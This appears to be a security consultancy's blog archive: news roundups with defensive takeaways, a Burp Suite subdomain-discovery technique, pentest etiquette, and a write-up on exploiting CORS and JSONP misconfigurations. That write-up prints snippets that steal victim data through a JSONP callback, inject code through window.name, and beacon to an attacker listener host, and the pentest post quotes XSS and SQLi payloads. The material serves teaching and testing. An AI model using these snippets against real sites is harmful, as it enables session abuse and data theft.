Thursday, March 15, 2018

Cyber Updates - 15th March 2018

Commercial disagreement leads to mass TLS certificate revocation

In a somewhat baffling story, 23,000 certificates sold by certificate reseller Trustico were suddenly revoked. It appears that Trustico wanted to move their customers to new certificates and saw this as a quick way of doing so.

Trustico requested that DigiCert, the certificate issuer, revoke 50,000 certificates, citing an unspecified compromise. DigiCert refused without evidence of compromise, so Trustico effectively created a compromise by emailing 23,000 private keys to DigiCert. At this point, under Certificate Authority rules, DigiCert had no alternative but to revoke these certificates, meaning that visitors to the affected sites could start receiving secure connection errors within 24 hours.

Key takeaways:

  • It is important to monitor the trustworthiness of your certificate provider. Let's Encrypt is a well-respected, free and easy-to-automate certificate provider.
  • Never allow a certificate provider to generate or get access to your private key. You should always generate a Certificate Signing Request (CSR) yourself and send that to the provider, see example instructions here and the example commands below.
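
As a minimal sketch of that process (the key size, domain and file names are placeholders), a key pair and CSR can be generated locally with OpenSSL so that only the CSR is sent to the provider and the private key never leaves your server:

# Generate a new 2048-bit RSA private key and a CSR for it locally.
# Send example.com.csr to the certificate provider; keep example.com.key private.
openssl req -new -newkey rsa:2048 -nodes \
    -keyout example.com.key \
    -out example.com.csr \
    -subj "/CN=example.com"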

Crypto-mining malware on UK and US government sites

Scott Helme, a UK-based security researcher, discovered that various UK government sites were serving up JavaScript which used the browser to mine cryptocurrency, causing significant CPU utilisation for the end user. Further investigation indicated that a third party called BrowseAloud, who provide a script that reads website content aloud for blind/partially sighted people, had been compromised. Their script had been altered to insert this crypto-mining script, meaning that any site using their script would be affected.

Key takeaways:

  • If enterprises or consumers use anti-malware protection on web browsing, it would hopefully detect and block this script.
  • Website administrators can use Subresource Integrity (SRI) to detect and block unexpected changes to third-party scripts, as in the sketch below.
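
A minimal sketch of an SRI-protected script include (the URL is a placeholder, and the integrity value must be the real base64-encoded hash of the exact script you expect to load):

<script src="https://thirdparty.example.com/widget.js"
        integrity="sha384-<base64 hash of the expected script>"
        crossorigin="anonymous"></script>

If the third party starts serving a script which no longer matches the hash, the browser simply refuses to execute it.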

Record DDoS attacks using memcached

A number of record-breaking DDoS attacks were seen in the last few weeks which utilised a service called memcached as an amplification vector. The amplification occurs because, when an attacker sends the service packets whose source address is spoofed to be the target's IP address, it replies with a response that can be up to 51,000 times the size of the original request, and that response is delivered to the victim.
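
For memcached operators, the usual hardening advice is to disable the UDP listener that the amplification abuses and to avoid exposing the service to the Internet at all. A minimal sketch (flag names per standard memcached builds; a real deployment would also set user, memory and firewall options):

# Disable UDP (-U 0) and listen only on an internal interface
memcached -U 0 -l 127.0.0.1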

One high-profile victim was GitHub although they were able to continue operations with minimal disruption with help from their DDoS protection provider.

Key takeaways:

  • DDoS is a scenario you have to plan for in advance; if you don't have a plan by the time an attack starts, it is likely to take you offline.
  • DDoS protection for such a large attack will require the assistance of your upstream Internet provider and potentially a specialist service.
  • Comsec offers a DDoS readiness service where you can assess the ability of your systems to withstand this type of attack.


Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Tuesday, February 6, 2018

Cyber Updates - 6th February 2018

CPU vulnerabilities revealed 

After several days of intense speculation, an embargo was lifted on the disclosure of two classes of processor vulnerabilities, dubbed "Meltdown" (affecting Intel specifically) and "Spectre" (affecting multiple processor manufacturers). These vulnerabilities allow one process to read sensitive data from another process, including passwords, session tokens and more. Three of the discoverers presented a talk on the vulnerabilities at the BlueHatIL conference here in Israel a few weeks ago.

As the vulnerabilities reside in the processors themselves, for now all that can be done is to apply patches to mitigate the issues. However, this process has not proceeded smoothly, with Microsoft having to hold off on deploying patches until users updated their anti-virus software, and culminating in Intel advising users to stop applying its patches until further notice.

Key takeaways:

  • Apply patches based on vendor advice and be sure to test patches in a staging environment before a mass deployment to production systems. This should be standard practice in any case.
  • These vulnerabilities have gathered a large amount of attention due to their branding and novelty, although their CVSS scores are a modest 5.6 because an attacker needs to execute code locally. This should be taken into account when prioritising efforts; there may be more serious issues which should be addressed first (see other items in this post).
  • If you are using antivirus software which is no longer being updated, or a system without any antivirus software at all, Windows may no longer install any updates due to the antivirus compatibility issue noted above!

Remotely exploitable Cisco vulnerabilities

A much more serious vulnerability was reported in Cisco ASA and Firepower edge devices which could allow a remote, unauthenticated attacker to execute code on the devices. As these devices are designed to be exposed to the Internet, this merited a CVSS score of 10. As with the previous story, patching was not straightforward: Cisco had to issue an updated patch because the first one was incomplete, and there were complaints that it took Cisco too long to inform customers.

Key takeaways:

  • This issue should be patched as soon as possible on all affected edge devices. 
  • All security controls should be considered to be layers and it would be a worthwhile exercise to consider what would happen if certain controls, e.g. use of network edge protection, were suddenly disabled or bypassed.

Further Weaponisation of MS17-010 vulnerabilities

We have previously spoken about the increased risk posed by vulnerabilities with easily available exploits. We therefore wanted to highlight the news that a security researcher has ported some of the NSA exploits (EternalRomance/EternalSynergy/EternalChampion), which previously worked on certain Windows versions, to run on any version since Windows 2000. These ported exploits are publicly available, which significantly increases the risk to older, unpatched systems.

Key takeaways:

  • If you have any version of Windows (server or desktop) from Windows 2000 onwards and it has not been patched with MS17-010, it can be remotely compromised wherever SMB is enabled (one way of checking for this from the network is sketched after this list).
  • Whilst MS17-010 patches can potentially be applied to Windows Server 2003 and Windows XP, it appears that Windows 2000 cannot be patched.
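
As a hedged way of checking exposure from the network side (assuming you have permission to scan the range, and that a reasonably recent Nmap with its scripting engine is available), the relevant Nmap script can flag hosts which still appear vulnerable:

# Check TCP/445 across a range for the MS17-010 vulnerability
nmap -p 445 --script smb-vuln-ms17-010 192.0.2.0/24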

The potential dangers of package managers  

A well-written blog post called "I’m harvesting credit card numbers and passwords from your site. Here’s how." went viral a few weeks back; it explained how it is possible to exploit the reliance on package managers in software development to insert malicious code into an application.

Liran Tal wrote an interesting rebuttal to the post where he points out that the premise of the post relies on blindly adding packages without consideration.

Key takeaways:

  • Clearly the scenario in the original post is possible although, as Liran says, this is more of an issue of developer awareness and due diligence with open source code.
  • R&D teams should be aware of the risk and maintain an inventory of the code libraries they are using and of how they can verify where those libraries have come from (one way of doing this with npm is sketched below).
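
As a rough example for npm-based projects (other package managers have equivalent mechanisms), the declared dependencies can be listed and the lockfile used to pin exactly what gets installed:

# List the project's direct dependencies and their resolved versions
npm ls --depth=0

# package-lock.json records an "integrity" (sha512) hash for every resolved
# package; commit it and treat unexpected changes to it as suspicious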



Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Tuesday, January 2, 2018

Cyber Updates - 2nd January 2018

Breach at PayPal subsidiary

PayPal disclosed at the start of December that the personal information of 1.6 million individuals may have been exposed when a subsidiary, TIO Networks, which had been acquired in July 2017, was breached. It is not clear whether the breach occurred before or after the acquisition, but TIO's systems had not yet been integrated into PayPal's environment, which was therefore not at risk. TIO had already suspended operations in November 2017.

Key takeaways:

  • Acquisitions can expose a well-controlled technology environment to new and unknown security risks if the new subsidiary's network is less well controlled.
  • Security due diligence should be part of the pre-acquisition process and the new environment should be carefully reviewed before integration into the main environment (as appears to have happened in this case).

Serious Privilege Escalation bug in macOS

A very serious security flaw was discovered in High Sierra, the latest version of macOS. Specifically, if a user tried to authenticate as root (the highest-privileged user) with a blank password in certain situations, the first attempt would not be accepted but would silently set the root password to blank, so the second attempt would allow the user to log in as root. Apple subsequently released a patch to address this. A detailed technical write-up of this is here.

Key takeaways:

  • It is important to keep on top of patch management at all levels of the business including endpoints.
  • All security controls should be considered to be layers and it would be a worthwhile exercise to consider what would happen if certain controls, e.g. use of low privilege endpoint users, were suddenly disabled or bypassed.

Top Secret data left exposed in Amazon S3 buckets

A couple of examples emerged recently of top secret US Department of Defense materials (including an entire virtual machine image) being found in unsecured Amazon S3 (Simple Storage Service) locations, allowing anyone on the Internet who discovered the locations to download them.

Key takeaways:

  • Use of cloud services is becoming ubiquitous but each cloud service needs someone who is skilled with using the service to act as "security administrator" to ensure these types of error do not occur.
  • Part of this should be frequent technical audits of the cloud environment to look for security issues or misconfigurations, as in the sketch below for S3.
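
A minimal sketch of such a check for S3 using the AWS CLI (the bucket name is a placeholder, and a full audit would also cover bucket policies and account-level settings):

# Review who is granted access by the bucket's ACL
aws s3api get-bucket-acl --bucket my-example-bucket

# Attempt an unauthenticated listing; if this succeeds, the bucket is publicly readable
aws s3 ls s3://my-example-bucket --no-sign-request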

Critical Vulnerability in Keeper password manager 

Tavis Ormandy discovered a critical flaw in the Keeper password manager (which comes bundled with Windows 10) which could allow an attacker to gain access to passwords stored using the tool. Whilst this was not a good situation, Keeper managed to make it worse by suing a news organisation which reported on it, thereby guaranteeing themselves a flood of negative publicity in the Information Security world.

Key takeaways:

  • Whilst having a critical vulnerability reported in your software is not ideal, if reported responsibly then you have effectively received valuable assistance for free.
  • Be wary of the "Streisand Effect" when responding to any actual or perceived issue.

Bonus link - Empathy in Incident Response 

I wanted to include this excellent blog post from Tracy Z. Maleeff (@InfoSecSherpa) as well, as it talks about a very important concept. If the security team wants users to help them and warn them when something has happened, it is important that users don’t feel scared to do so.



Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Thursday, November 23, 2017

Cyber Updates - 23rd November 2017

Final Release of the new OWASP Top 10

The final version of the OWASP Top 10 2017 has now been released. Following a controversial RC1 release, the project underwent a significant overhaul in the past six months, including a change of leadership and a move to a fully transparent methodology based on data received and community feedback. The final release removes CSRF and Unvalidated Redirects, merges two previous categories into Broken Access Control, and introduces three new categories: XML External Entities (XXE), Insecure Deserialization, and Insufficient Logging and Monitoring.

Key takeaways:

  • Many different standards and frameworks reference the OWASP Top 10 or require companies to demonstrate that they are addressing the risks which it includes. It is important that application security teams understand the new risks which have been added including how to test for them and how to develop applications which are protected against them.
  • It is also important to remember that this is just a condensed list and that a full application security program needs to consider the full spectrum of potential application security issues.


Uber Reveals Data Breach of 57 million records

Bloomberg broke a story this week that in 2016 Uber paid hackers to delete, and not disclose, 57 million records which had been stolen in a data breach. The data included names, email addresses and phone numbers for 50 million Uber users, and data on 7 million drivers including US driving licence details. Uber themselves acknowledged that they had a legal obligation to disclose the breach but did not do so.

Key takeaways:

  • One of the key concerns in this case is that Uber did not disclose when they were legally (and ethically) obligated to do so. These should be key considerations when a data breach is discovered.
  • Another key concern is that Uber effectively paid a "ransom" to the hackers despite potentially having no way of verifying that the data had been deleted and would not be used. As well as potentially also being illegal, this is generally a poor approach to dealing with a situation of this kind.

Serious Intel CPU Vulnerabilities Disclosed

Following some speculation, and based on findings from external researchers, Intel released a security advisory detailing significant security vulnerabilities in a number of its CPUs used in desktops, servers and "Internet of Things" devices. The vulnerabilities could allow an attacker to remotely take control of affected machines and access privileged data. This is particularly serious because the vulnerability is in the CPU itself and is therefore completely separate from the main PC operating system.

Key takeaways:

  • IT organisations should start reviewing their IT assets for this vulnerability and work with the relevant system manufacturer (e.g. Dell, Lenovo, HP, etc) to receive and apply updated firmware.
  • Defense in depth measures such as network segmentation and endpoint isolation should always be in place to mitigate the effect of a vulnerability of this sort.

From XSS to RCE, Hidden uses of JavaScript 

We are starting to see applications written using "Electron", a technology which utilises Node.js to allow developers to write desktop applications as if they were web applications (HTML, CSS and JavaScript). A Swiss security researcher published an article detailing how he found a Cross-Site Scripting (XSS) vulnerability in GitHub's Atom text editor and was able to escalate this to Remote Code Execution due to the use of Electron.
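
One relevant mitigation within Electron itself is to avoid giving rendered web content direct access to Node.js APIs, which makes it much harder to turn an XSS into code execution. A minimal sketch (window options simplified, and not taken from the Atom code in question):

// main.js - create a window whose web content cannot reach Node.js APIs directly
const { app, BrowserWindow } = require('electron');

app.on('ready', () => {
  const win = new BrowserWindow({
    webPreferences: {
      nodeIntegration: false  // do not expose require()/process to page scripts
    }
  });
  win.loadURL('https://example.com/app/index.html');
});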

Key takeaways:

  • Application developers should fully understand the implications of adopting new technologies and frameworks.
  • Less mature frameworks will have less available security information and therefore careful security testing should be performed before deployment.

Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Monday, November 20, 2017

About (Weird) CORS Exploitations

During our daily routine, we face lots of different kinds of web applications, which are built differently from one another. Sometimes the developers have the need to pass information from one subdomain to another, or generally between different domains. This need might be for rendering purposes or for crucial functionality such as passing access tokens and session identifiers to another cooperative application.

As you may know, browsers do not allow AJAX requests to be sent from one domain (or subdomain) to another for security reasons; this security policy is called the Same Origin Policy (SOP).

So in order to allow cross-domain communication, developers had to use different “hacks” to bypass SOP and pass this allegedly “sensitive information”, until Cross-Origin Resource Sharing (CORS) came into the picture and changed the whole game.

This article sums up an extreme case of CORS misconfiguration that led me to exploit the application’s vulnerable configuration a little bit differently from what I expected.

Chapter A - The (OLD) problem:
The most common method was the use of JSONP, which will be discussed below, along with JavaScript tricks such as storing information in DOM-based objects.

JSONP works with specific server endpoints: it retrieves user-related information from them using the user’s session and a callback that needs to be handled on the client side. Every response is wrapped in a padding function (hence the P in JSONP). For example:

The victim application runs on domain-a.com and publishes a server endpoint called “getUsers”. Note that the callback parameter “users” also determines the name of the padding function:
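
A request to that endpoint might look something like this (the exact URL format is an assumption based on the description above):

https://domain-a.com/getUsers?callback=users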

The callback would be: users({"userA":"John","userB":"Smith"})

This scenario is extremely vulnerable, since domain-b.com only has to load this endpoint on its site and wait for the victim to visit. When this happens, an HTTP GET request is sent to domain-a.com along with the victim’s cookie (similar to classic CSRF), and the callback is then returned for domain-b to handle. For example:

function users(json) {
    // Attacker-defined padding function on domain-b: it receives the victim's
    // data and forwards it to an attacker-controlled collection point
    callbackStealer(json.userA);
}

More information about JSONP can be found over here: https://www.sitepoint.com/jsonp-examples/

Additionally, the JavaScript tricks that developers used could also leave a site extremely vulnerable to DOM-based XSS attacks. For example:
domain-a might use the window.name object to store information and then redirect the tab to domain-b (window.location = "domain-b"). Eventually domain-b will eval() the information stored in window.name.

How can we exploit it? It’s simple:
Our attacking domain (domain-c) should store the XSS payload in window.name and then redirect to domain-b:

<script>
window.name = "some AJAX-based payload to perform a critical action in the targeted application";
window.location = "http://domain-b.com"; // Remember? This domain should eval(window.name); by design
</script>

And since domain-b executes the code stored in window.name, we were able to totally pwn the application using a third-party malicious site of our own.

But today you won’t see this happen much, so you can mainly use this method to exploit an XSS you have already found.

Chapter B - The (NEW) problem:
Later on, HTML5 brought a game-changing feature called Cross-Origin Resource Sharing (CORS). This new policy allows developers to determine which domains are allowed to communicate with their application’s domain, so no hacks are needed – but education and security awareness are!

Frameworks that support CORS often come with an “out of the box” configuration; we'll see some examples below.

The first wave of CORS policy taught the browser how to behave and allow two-way interaction between domains and subdomains. The policy tells the browser (using HTTP headers in the server’s response) whether or not a different domain may interact with the current domain.

Some frameworks work with a default configuration that simply takes the origin of the request and automatically allows it by sending that origin back in the response headers. For example, consider a request in which the Origin header has been changed to evil.com, and the response it receives.

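As a rough sketch of what such an exchange might look like (the endpoint path, cookie and response body are illustrative assumptions, not taken from the original screenshots):

GET /api/currentUser HTTP/1.1
Host: www.domain-a.com
Origin: https://evil.com
Cookie: SESSIONID=<victim's session cookie>

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
Content-Type: application/json

{"userA":"John","userB":"Smith"}
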
So much for CORS huh..?
Note that Access-Control-Allow-Credentials: true allows XMLHttpRequests (XHRs) to send the victim’s cookie from ANY domain. That’s a JavaScript-based CSRF, which is far "smarter" than the HTML-based version.

But people learned… And hardened their CORS policy. Plus, modern browsers don't even send the actual HTTP request until they get an answer to the pre-flight request, which looks like this:
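
A sketch of such a pre-flight exchange (paths, methods and header values are illustrative; this one also shows the kind of permissive pre-flight configuration referred to further down):

OPTIONS /api/currentUser HTTP/1.1
Host: www.domain-a.com
Origin: https://evil.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: Content-Type

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Methods: GET, POST, PUT, DELETE
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true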

In my extreme case, every server endpoint was hardened with a secure CORS policy and didn’t allow any domain to interact with it… meaning it wouldn't show the response to the browser which executed the JS code. For example:
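
For instance, the response to the actual cross-origin request might look something like this (values are illustrative); because the Access-Control-Allow-Origin header does not match the attacker's origin, the browser refuses to expose the response to the calling script:

GET /api/currentUser HTTP/1.1
Host: www.domain-a.com
Origin: https://evil.com
Cookie: SESSIONID=<victim's session cookie>

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.domain-a.com
Content-Type: application/json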

BUT (!) the pre-flight request was not secured (see the example of such a configuration in the OPTIONS request above). This means that the browser will allow us to send a request to the targeted domain but not read the response.

Therefore we cannot acquire additional information such as anti-CSRF tokens or nonce values, but we still have an upgraded CSRF that supports different HTTP verbs and headers (depending on the response to the pre-flight request).

TIP: we can tell whether someone executed our script by adding a call to our own web listener. For example:

// Trigger the sensitive action in the targeted application (placeholder), then
// report back to our web listener so we know the payload was executed
$.ajax({ /* some action in the targeted application */ });
new Image().src = "http://web.listener.com?q=somebody+just+fell+in+your+trap";

A simple AJAX call is enough for a proof of concept, and you could potentially delete the app's admin account, change account settings… whatever.

In conclusion,
remember to always test every endpoint, including the pre-flight request, by changing the Origin to an arbitrary domain, and ensure that the site is not vulnerable.

Good Luck !

Rotem Tsadok
Head of Offensive Security & Response Unit  

Tuesday, November 14, 2017

ComTech: Using Burp Suite to Discover Domains

Introduction

There are many reasons why you may want to use a brute-force method to discover web domains or sub-domains, for example reconnaissance or attack surface discovery.

Whilst Burp Suite can discover content in folders below a domain using a brute-force approach (see: here), it cannot use this approach to find domains.

Burp Intruder would be a possible tool for this (assuming you are looking for web sites), except that you have to specifically choose the target domain on the first tab, so the domain cannot be chosen as a payload position to be brute-forced by Intruder. Once I realised this, I started thinking about how I could use Burp's features to enable this, and I have set out the solution below. Note that this assumes you are already familiar with how Burp Suite works, and that it will only work with Burp Suite Pro.


Invisible Proxying

The answer is to create an invisible proxy in Burp. Invisible proxying is the way in which Burp handles client applications which cannot be specifically configured to use a proxy. As explained here https://portswigger.net/burp/help/proxy_options_invisible, applications which can be configured to use a proxy send the full URL to the proxy so that the proxy knows where to send the request on to. An application which cannot be configured to use a proxy only includes the path in the request, not the domain itself.

Invisible proxy mode effectively means that Burp decides where to send the request based on the Host header in the HTTP request. The Host header can be selected as a payload position in Intruder, so we can fuzz it.


Configuring Burp Suite


Setting up the proxy

The first thing I have to do is set up a new proxy listener in Burp. In this case I have it listening on port 443, although you could choose any available port. The important thing here is that I have selected the invisible proxy option.



Setting up Intruder

I have already sent a standard GET request to Intruder. I now go to the Target tab and, for the target, I choose localhost and the port where my invisible proxy is listening, in this case 443.


I can see the standard GET request which I sent in the Positions tab, and I can now select the part of the domain in the Host header which I want to attack. I have just chosen one payload position, but I could obviously choose multiple positions if I wanted to attempt multiple types. You could also add a port onto the Host header and choose that as a payload if you wanted to attempt multiple ports; a sketch of such a request is shown below.
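
As a rough illustration (the domain, headers and payload position are placeholders, not the actual request from my screenshots), the request in the Positions tab might look like this, with Intruder's § markers wrapping the part of the Host header to be fuzzed:

GET / HTTP/1.1
Host: §www§.example-target.com
User-Agent: Mozilla/5.0
Accept: */*
Connection: close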


The rest is the same as a standard Intruder attack; in my case I have chosen a character brute-force payload, but you will probably want to use a predefined list of likely domains.


Executing the attack


Intruder will give you an error about the target and Host header not matching, but you can ignore that.


Reviewing the results


You can now go through the intruder results to look at what was returned.


Interestingly, because you are looping back through Burp's proxy, you will also see the requests that were sent in the proxy history list.


I hope this little trick is useful. If you have any comments, critiques or suggestions, you can contact me using the details below.


Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Sunday, September 17, 2017

ComTech: Do's and Don'ts in production environment pentest

Hello everyone
After a short break, ComTech is back.

Today's post will talk about something that is relevant to every pentest: the do's and don'ts of pentesting production environments.
Let's start:
  • Don't use automated scanners, or use them as little as possible.
    In application PT - use none, do everything manually. In infrastructure PT - use only the ones you really need. The automated scanners that should be avoided include vulnerability scanners (Nessus and OpenVAS in infra PT, Burp Pro's scanner and Acunetix in app PT).
  • Perform as much of the test as possible manually.
  • In particular, don't use any tools in OT environments (industrial control systems, SCADA). These environments are especially sensitive, and a simple port scan might crash them altogether.
  • If you do need to use tools in infra PT, make sure you mark the "safe checks" checkbox if it exists (Nessus, OpenVAS).
  • Don't use payloads that can cause any damage. This includes innocent-looking payloads such as the classic XSS and SQLi payloads <script>alert('xss')</script> and ' or 1=1-- in app PT.
    The first might pop up a message on a production page via persistent XSS, which would cause embarrassment to the client; the second, if injected in the wrong place, could delete all of the records in a table (if injected into a DELETE statement), or issue a query that fetches all of the records and might bring the system down.
  • Always clean up after yourself, and make your best effort to delete any testing records and data, especially any data stored in persistent storage (a database).
  • In infra PT (and this is also relevant to app PT), don't send large inputs to a tested interface, as they might also cause the system to crash.
  • If money is involved, always ask the client for QA credit cards. Avoid using your own credit card in PTs. 
  • Don't change any configuration in an admin interface or CMS, unless explicitly permitted by the client.
  • Open and use dedicated test email accounts, so that your real mailbox won't get spammed long after the test is over.
  • Don't perform online login brute-force attacks without permission, as they might lock out production users.
  • If you are testing a hosted cloud-based system, always make sure you have the appropriate permissions to do so, and that the cloud provider is aware and approves it.
  • In spite of what is written above, always talk to the client and align expectations. There might be specific production environments in which you are allowed to do some of the don'ts mentioned above.
Stay safe



Gil Cohen
CTO